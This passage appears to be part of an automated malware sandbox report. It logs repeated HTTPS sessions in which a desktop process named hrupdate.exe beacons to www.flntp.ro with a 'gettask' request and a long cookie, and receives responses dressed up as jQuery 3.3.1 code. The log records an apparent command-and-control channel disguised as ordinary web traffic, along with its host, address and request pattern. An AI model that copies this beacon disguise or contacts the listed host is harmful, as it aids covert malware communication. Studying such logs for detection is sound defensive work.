                                                              Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              12192.168.2.4497503.79.209.764437428C:\Users\user\Desktop\hrupdate.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-12-19 21:40:36 UTC485OUTGET /rss/portallogin-gettask.html HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Host: www.flntp.ro
                                                              Accept-Encoding: gzip, deflate
                                                              Cookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0Q
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache
                                                              2024-12-19 21:40:37 UTC235INHTTP/1.1 200 OK
                                                              Server: nginx/1.24.0 (Ubuntu)
                                                              Date: Thu, 19 Dec 2024 21:40:36 GMT
                                                              Content-Type: application/javascript; charset=utf-8
                                                              Content-Length: 5713
                                                              Connection: close
                                                              Cache-Control: max-age=0, no-cache
                                                              Pragma: no-cache
                                                              2024-12-19 21:40:37 UTC5713INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                                              Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              13192.168.2.4497513.79.209.764437428C:\Users\user\Desktop\hrupdate.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-12-19 21:40:38 UTC485OUTGET /rss/portallogin-gettask.html HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Host: www.flntp.ro
                                                              Accept-Encoding: gzip, deflate
                                                              Cookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0Q
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache
                                                              2024-12-19 21:40:39 UTC235INHTTP/1.1 200 OK
                                                              Server: nginx/1.24.0 (Ubuntu)
                                                              Date: Thu, 19 Dec 2024 21:40:39 GMT
                                                              Content-Type: application/javascript; charset=utf-8
                                                              Content-Length: 5692
                                                              Connection: close
                                                              Cache-Control: max-age=0, no-cache
                                                              Pragma: no-cache
                                                              2024-12-19 21:40:39 UTC5692INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                                              Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              14192.168.2.4497523.79.209.764437428C:\Users\user\Desktop\hrupdate.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-12-19 21:40:40 UTC485OUTGET /rss/portallogin-gettask.html HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Host: www.flntp.ro
                                                              Accept-Encoding: gzip, deflate
                                                              Cookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0Q
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache
                                                              2024-12-19 21:40:41 UTC235INHTTP/1.1 200 OK
                                                              Server: nginx/1.24.0 (Ubuntu)
                                                              Date: Thu, 19 Dec 2024 21:40:41 GMT
                                                              Content-Type: application/javascript; charset=utf-8
                                                              Content-Length: 5649
                                                              Connection: close
                                                              Cache-Control: max-age=0, no-cache
                                                              Pragma: no-cache
                                                              2024-12-19 21:40:41 UTC5649INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                                              Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              15192.168.2.4497533.79.209.764437428C:\Users\user\Desktop\hrupdate.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-12-19 21:40:42 UTC485OUTGET /rss/portallogin-gettask.html HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Host: www.flntp.ro
                                                              Accept-Encoding: gzip, deflate
                                                              Cookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0Q
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache
                                                              2024-12-19 21:40:43 UTC235INHTTP/1.1 200 OK
                                                              Server: nginx/1.24.0 (Ubuntu)
                                                              Date: Thu, 19 Dec 2024 21:40:43 GMT
                                                              Content-Type: application/javascript; charset=utf-8
                                                              Content-Length: 5628
                                                              Connection: close
                                                              Cache-Control: max-age=0, no-cache
                                                              Pragma: no-cache
                                                              2024-12-19 21:40:43 UTC5628INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                                              Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              16192.168.2.4497543.79.209.764437428C:\Users\user\Desktop\hrupdate.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-12-19 21:40:45 UTC485OUTGET /rss/portallogin-gettask.html HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Host: www.flntp.ro
                                                              Accept-Encoding: gzip, deflate
                                                              Cookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0Q
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache
                                                              2024-12-19 21:40:45 UTC235INHTTP/1.1 200 OK
                                                              Server: nginx/1.24.0 (Ubuntu)
                                                              Date: Thu, 19 Dec 2024 21:40:45 GMT
                                                              Content-Type: application/javascript; charset=utf-8
                                                              Content-Length: 5671
                                                              Connection: close
                                                              Cache-Control: max-age=0, no-cache
                                                              Pragma: no-cache
                                                              2024-12-19 21:40:45 UTC5671INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                                              Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              17192.168.2.4497553.79.209.764437428C:\Users\user\Desktop\hrupdate.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-12-19 21:40:47 UTC485OUTGET /rss/portallogin-gettask.html HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Host: www.flntp.ro
                                                              Accept-Encoding: gzip, deflate
                                                              Cookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0Q
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache
                                                              2024-12-19 21:40:48 UTC235INHTTP/1.1 200 OK
                                                              Server: nginx/1.24.0 (Ubuntu)
                                                              Date: Thu, 19 Dec 2024 21:40:47 GMT
                                                              Content-Type: application/javascript; charset=utf-8
                                                              Content-Length: 5607
                                                              Connection: close
                                                              Cache-Control: max-age=0, no-cache
                                                              Pragma: no-cache
                                                              2024-12-19 21:40:48 UTC5607INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                                              Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              18192.168.2.4497563.79.209.764437428C:\Users\user\Desktop\hrupdate.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-12-19 21:40:49 UTC485OUTGET /rss/portallogin-gettask.html HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Host: www.flntp.ro
                                                              Accept-Encoding: gzip, deflate
                                                              Cookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0Q
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache
                                                              2024-12-19 21:40:50 UTC235INHTTP/1.1 200 OK
                                                              Server: nginx/1.24.0 (Ubuntu)
                                                              Date: Thu, 19 Dec 2024 21:40:50 GMT
                                                              Content-Type: application/javascript; charset=utf-8
                                                              Content-Length: 5649
                                                              Connection: close
                                                              Cache-Control: max-age=0, no-cache
                                                              Pragma: no-cache
                                                              2024-12-19 21:40:50 UTC5649INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                                              Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              19192.168.2.4497573.79.209.764437428C:\Users\user\Desktop\hrupdate.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-12-19 21:40:51 UTC485OUTGET /rss/portallogin-gettask.html HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Host: www.flntp.ro
                                                              Accept-Encoding: gzip, deflate
                                                              Cookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0Q
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache
                                                              2024-12-19 21:40:52 UTC235INHTTP/1.1 200 OK
                                                              Server: nginx/1.24.0 (Ubuntu)
                                                              Date: Thu, 19 Dec 2024 21:40:52 GMT
                                                              Content-Type: application/javascript; charset=utf-8
                                                              Content-Length: 5649
                                                              Connection: close
                                                              Cache-Control: max-age=0, no-cache
                                                              Pragma: no-cache
                                                              2024-12-19 21:40:52 UTC5649INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                                              Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              20192.168.2.4497583.79.209.764437428C:\Users\user\Desktop\hrupdate.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-12-19 21:40:54 UTC485OUTGET /rss/portallogin-gettask.html HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Host: www.flntp.ro
                                                              Accept-Encoding: gzip, deflate
                                                              Cookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0Q
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache
                                                              2024-12-19 21:40:54 UTC235INHTTP/1.1 200 OK
                                                              Server: nginx/1.24.0 (Ubuntu)
                                                              Date: Thu, 19 Dec 2024 21:40:54 GMT
                                                              Content-Type: application/javascript; charset=utf-8
                                                              Content-Length: 5607
                                                              Connection: close
                                                              Cache-Control: max-age=0, no-cache
                                                              Pragma: no-cache
                                                              2024-12-19 21:40:54 UTC5607INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                                              Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              21192.168.2.4497593.79.209.764437428C:\Users\user\Desktop\hrupdate.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-12-19 21:40:56 UTC485OUTGET /rss/portallogin-gettask.html HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Host: www.flntp.ro
                                                              Accept-Encoding: gzip, deflate
                                                              Cookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0Q
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache
                                                              2024-12-19 21:40:57 UTC235INHTTP/1.1 200 OK
                                                              Server: nginx/1.24.0 (Ubuntu)
                                                              Date: Thu, 19 Dec 2024 21:40:57 GMT
                                                              Content-Type: application/javascript; charset=utf-8
                                                              Content-Length: 5713
                                                              Connection: close
                                                              Cache-Control: max-age=0, no-cache
                                                              Pragma: no-cache
                                                              2024-12-19 21:40:57 UTC5713INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                                              Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              22192.168.2.4497603.79.209.764437428C:\Users\user\Desktop\hrupdate.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-12-19 21:40:58 UTC485OUTGET /rss/portallogin-gettask.html HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Host: www.flntp.ro
                                                              Accept-Encoding: gzip, deflate
                                                              Cookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0Q
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache
                                                              2024-12-19 21:40:59 UTC235INHTTP/1.1 200 OK
                                                              Server: nginx/1.24.0 (Ubuntu)
                                                              Date: Thu, 19 Dec 2024 21:40:59 GMT
                                                              Content-Type: application/javascript; charset=utf-8
                                                              Content-Length: 5671
                                                              Connection: close
                                                              Cache-Control: max-age=0, no-cache
                                                              Pragma: no-cache
